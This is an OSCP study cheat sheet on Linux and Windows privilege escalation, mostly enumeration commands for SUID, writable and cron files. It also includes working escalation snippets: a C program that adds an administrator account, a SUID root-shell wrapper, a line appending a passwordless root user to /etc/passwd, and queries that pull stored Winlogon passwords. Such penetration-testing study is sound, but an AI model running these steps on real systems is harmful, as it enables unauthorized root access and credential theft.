OSCP
Search…
⌃K

Priv Escalation

Privilege Escalation

Linux Privilege Escalation

  • sudo -l
  • Kernel Exploits
  • OS Exploits
  • Password reuse (mysql, .bash_history, 000-default.conf...)
  • Known binaries with suid flag and interactive (nmap)
  • Custom binaries with suid flag either using other binaries or with command execution
  • Writable files owned by root that get executed (cronjobs)
  • MySQL as root
  • Vulnerable services (chkrootkit, logrotate)
  • Writable /etc/passwd
  • Readable .bash_history
  • SSH private key
  • Listening ports on localhost
  • /etc/fstab
  • /etc/exports
  • /var/mail
  • Process as other user (root) executing something you have permissions to modify
  • SSH public key + Predictable PRNG
  • apt update hooking (Pre-Invoke)
  • Capabilities

Windows Privilege Escalation

  • Kernel Exploits
  • OS Exploits
  • Pass The Hash
  • Password reuse
  • DLL hijacking (Path)
  • Vulnerable services
  • Writable services binaries path
  • Unquoted services
  • Listening ports on localhost
  • Registry keys

Kernel Exploits

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html
Windows Add User
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
return 0;
}
SUID Change
SUID
Set owner user ID.
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
Privilege Escalation:
#Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null
#Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null
#Find sticky-bit binaries
find / -perm -1000 -type d 2>/dev/null
find / -perm -4000 2>/dev/null
writable by everyone
find / -writable -type f 2>/dev/null
World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Writeable config files
find /etc/ -writable -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Window Exploit Suggester
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevated
Check if the following registry settings are set to "1"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Basic Linux Enumeration
Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
Default writeable directory / folder
/tmp
/dev/shm
Search for passwords
Search for password within config.php
grep -R 'password' config.php
Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
Service(s) running as root user
ps aux | grep root
ps -ef | grep root
Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/
Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'
Sticky bit, SGID, SUID, GUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd